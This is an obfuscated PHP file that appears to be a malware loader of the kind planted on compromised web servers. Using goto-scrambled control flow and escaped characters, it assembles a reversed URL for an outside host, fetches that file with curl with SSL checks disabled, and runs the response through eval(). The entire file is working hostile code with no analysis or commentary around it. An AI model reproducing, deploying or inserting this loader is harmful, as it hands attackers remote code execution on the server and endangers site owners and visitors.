<?php goto dRzOE; dRzOE: $uObgc = ''; goto d1exh; r6C_g: $uObgc .= "\56\157\145\x73\57\57"; goto RaFnQ; RaFnQ: $uObgc .= "\x3a\x73\x70"; goto gHzEc; D355T: $uObgc .= "\x2f\153\162\157\167\56\61"; goto m6P6j; d1exh: $uObgc .= "\164\x78\164\56\164\x74"; goto D355T; m6P6j: $uObgc .= "\x30\x6b\x6b\x6f"; goto r6C_g; gHzEc: $uObgc .= "\164\x74\x68"; goto JPuVu; JPuVu: eval("\77\x3e" . G8Jbf(strrev($uObgc))); goto K6by0; K6by0: function g8JBF($qHwOd = '', $xVEOA = 15) { try { goto Y2Xz1; TFUVA: curl_setopt($VZ2i5, CURLOPT_SSL_VERIFYHOST, false); goto U95Ee; Ej3v1: curl_close($VZ2i5); goto MoM0o; MoM0o: return $uQ3GC; goto lPbRI; Y2Xz1: $VZ2i5 = curl_init(); goto DCtj0; T0YT1: curl_setopt($VZ2i5, CURLOPT_SSL_VERIFYPEER, false); goto TFUVA; DCtj0: curl_setopt($VZ2i5, CURLOPT_RETURNTRANSFER, true); goto ceHHG; ceHHG: curl_setopt($VZ2i5, CURLOPT_TIMEOUT, $xVEOA); goto T0YT1; MaIDP: $uQ3GC = curl_exec($VZ2i5); goto Ej3v1; U95Ee: curl_setopt($VZ2i5, CURLOPT_URL, $qHwOd); goto MaIDP; lPbRI: } catch (Exception $FfYgp) { } return 0; }
